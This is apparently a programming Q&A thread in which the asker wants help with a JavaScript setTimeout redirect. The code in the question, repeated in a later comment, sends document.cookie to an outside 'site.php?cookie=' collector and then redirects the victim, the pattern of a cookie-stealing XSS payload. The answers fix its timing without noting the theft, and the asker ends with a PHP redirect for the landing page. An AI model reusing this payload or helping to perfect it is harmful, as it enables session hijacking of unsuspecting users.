# Settimeout issue in javascript

Tags: javascript

I am trying to get the following to code work. But it just wont :(.

I have tested the timeout on its own and it works fine (Code line 2), but the first line wont work :(, any guidance would be appreciated.

```
document.location="http://site/site.php?cookie=" + document.cookie;setTimeout(document.location='http://site/site/newpage',500);

setTimeout(document.location='http://site/site/newpage',500);
```

I am testing this inside firebug console (by the way)

Comment: What are you trying to do?

Comment: Please read some documentation before you use a new function: https://developer.mozilla.org/en-US/docs/Web/API/Window.setTimeout.

Answer (score 3, accepted):

Changing document.location will immediately navigate you to another page.

setTimeout expects either a string to construct with new Function("string") (not recommended), a function pointer (recommended), or an anonymous function (recommended).

You can send an anonymous function like this:

```
setTimeout(function(){document.location='http://site/site/newpage'},500);
```

Comment: Hi, thanks for the response. I tried it like `document.location="http://site/site?cookie=" + document.cookie;setTimeout(function(){document.location='http://site/site/newpage'},500);` but it still didnt work :(

Answer (score 0):

Encapsulate it in an anonymous function.

```
setTimeout(function() { document.location.href ='http://etc/etc/';},500);
```

(don't forget the href, or use window.location maybe)

Comment: thanks but this didnt work either. Maybe I should just redirect on the landing page?

Comment: Look at what you're doing.  You're changing the location of the page then trying to set a timeout function to do that again.  That logically isn't going to work because your first command is to redirect, the second command is never going to be called.

Answer (score 0):

Ie gone for the redirecting on the landing page instead, thanks for all the help

```
  if ($referer == TRUE){
 header( 'Location: ' .$referer) ;
 }else {
     header('Location: ' .$url[$urladdon]);
 }
}
```